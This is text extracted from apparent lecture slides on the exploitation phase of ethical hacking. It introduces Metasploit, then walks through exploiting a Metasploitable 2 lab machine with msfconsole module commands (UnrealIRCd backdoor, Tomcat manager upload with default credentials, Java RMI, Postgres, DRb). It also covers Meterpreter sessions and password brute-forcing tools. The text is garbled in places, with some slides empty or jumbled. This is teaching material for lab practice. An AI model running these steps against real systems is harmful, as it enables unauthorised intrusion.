Testing & Ethical

Unit :Hacking&
2 Ethical
Hacking Phase
Exploitation

By:
Dr. Sumitra
 Metasploit

 Metasploit is the world's leading

exploitation framework. Originally
developed by HD Moore as an open source
project.
 It is now owned by the security company,
Rapid7, which also owns the vulnerability
scanner, Nexpose.

 Although originally developed as an open

source project, Rapid7 has now developed a
Pro version of Metasploit
 Components of Metasploit
Framework
 Msfconsole:This is the command line
interface that is used by the Metasploit
Framework. It enables you to navigate
through all the Metasploit databases at
ease and use the required modules.
 Msfdb:Metasploit Framework gives the
option to use PostgreSQL database to store
and access your data quickly and
efficiently.
 Msfvenom:This is the tool helps you create
your own payloads
How to start Metasploit

 Before we start Metasploit, we should

start the postgresql database.
 Metasploit will work without
postgresql, but this database enables
Metasploit to run faster.
 searches and store the information you
collect while scanning and exploiting.
 kali > service postgresql start
Metasploit
Metasploit
 Metasploit
 Exploits are code or tools used to take
advantage of vulnerabilities in software,
systems, or networks.
 Metasploit includes 2461 exploits, which
cover a wide range of software and systems.
 Auxiliary Modules: These modules are used
for functions like scanning, information
gathering, and other actions that do not
necessarily involve exploiting a vulnerability.
 Examples include port scanners, vulnerability
scanners, and protocol analyzers.
 Metasploit
 Post Modules :Post-exploitation modules help users
perform actions after successfully gaining access to
a system.
 These can include gathering system information,
privilege escalation,
Payloads: Payloads areorthe
installing
pieces backdoors .
of code executed
on a target system after a successful exploit.
Metasploit has 1471 payloads, including:
Single Payloads: Perform a single action (e.g.,
execute a command).
Stagers: Set up a communication channel for larger
payloads (e.g., meterpreter).
Stages: Larger payloads delivered in pieces by
stagers (e.g., file transfers).
 Metasploit

 Encoders : Encoders are used to encode payloads

to evade detection by intrusion
detection/prevention systems or antivirus software.

•NOPs (11): No-operation instructions are used to pad

exploit payloads to ensure they fit into a specific
memory layout.

•Evasion (9): Evasion modules are used to bypass

security defenses, such as firewalls, intrusion
detection systems (IDS), or antivirus solutions.
Metasploit
 Let's take a look at some of those
keywords.
 msf > help
 msf > use :The "use" command loads a
module.
 msf> show:After you load a module, the
show command is used to gather more
information on the module.
 msf > info
Metasploit
Metasploit
Metasploit
Exploit the machine using
Metasploit
Check IP address of my Machine
Scan the network
Vulnerable Machine (Metasploitable
2)
Open Ports(Metasploitables)
Find vulnerability

Use that exploit

Find vulnerability
Exploit
Exploit using Open Port 139
Cont..
Cont..
Cont..
Check
Exploit using Port no. 512,513
(Remote login)
Exploiting Port 22 SSH
Exploiting Port 22 SSH
Exploiting port 23 TELNET
Exploiting port 23 TELNET
 Exploiting Port 80
port 80 is open so we type in the IP address of
Metasploitable 2 in our browser and notice that it is
running PHP (argument injection vulnerability of
PHP).
Exploiting Port 80

msf > use exploit/multi/http/php_arg_injection msf

exploit

(multi/http/php_arg_injection) > set rhost

192.168.239.118

msf exploit (multi/http/php_arg_injection) >

exploit
 Exploiting Port 8080 (Java)

This module takes advantage of the default

configuration of the RMI Registry and RMI
Activation services, which allow loading classes
from any remote (HTTP) URL.
msf > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > set rhost
192.168.239.118
msf exploit(multi/misc/java_rmi_server) > exploit
 Exploiting Port 5432 (Postgres)

msf > use exploit/linux/postgres/postgres_payload

msf exploit (linux/postgres/postgres_payload) > set

rhost 192.168.239.118

msf exploit (linux/postgres/postgres_payload) >

exploit
Exploiting Port 6667
(UnrealIRCD)
msf > use
exploit/unix/irc/unreal_ircd_3281_backdoor

msf exploit (unix/irc/unreal_ircd_3281_backdoor) >

set rhost 192.168.239.118

msf exploit (unix/irc/unreal_ircd_3281_backdoor) >

exploit
 Remote Shell Exploitation

rsh -l msfadmin 192.168.239.118 ifconfig

Exploiting Distributed Ruby Remote Code Execution (8787)

msf > use

exploit/linux/misc/drb_remote_codeexec

msf exploit (linux/misc/drb_remote_code) > set

rhost 192.168.239.118
msf exploit (linux/misc/drb_remote_code) >
exploit
Access Port 2121 (ProFTPD

telnet 192.168.239.118 2121

 Exploiting Port 8180 (Apache
Tomcat)
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit (multi/http/tomcat_mgr_upload) > set
rhost 192.168.239.118
msf exploit (multi/http/tomcat_mgr_upload) > set
rpost 8108
msf exploit (multi/http/tomcat_mgr_upload) > set
httpusername tomcat
msf exploit (multi/http/tomcat_mgr_upload) > set
httppassword tomcat
msf exploit (multi/http/tomcat_mgr_upload) > exploit
How to take Meterpreter
session
Step 1 Take normal shell of target machine
How to take Meterpreter
session
How to take Meterpreter
session
How to take Meterpreter
session
How to take Meterpreter
session
How to take Meterpreter
session
How to crack password

Crunch
Crewl to generate the password list
Crunch :to generate custom list (permutation and
combination) brute force(meaningless word)
Minimum and maximum length
Hydra (best graphical and user interface)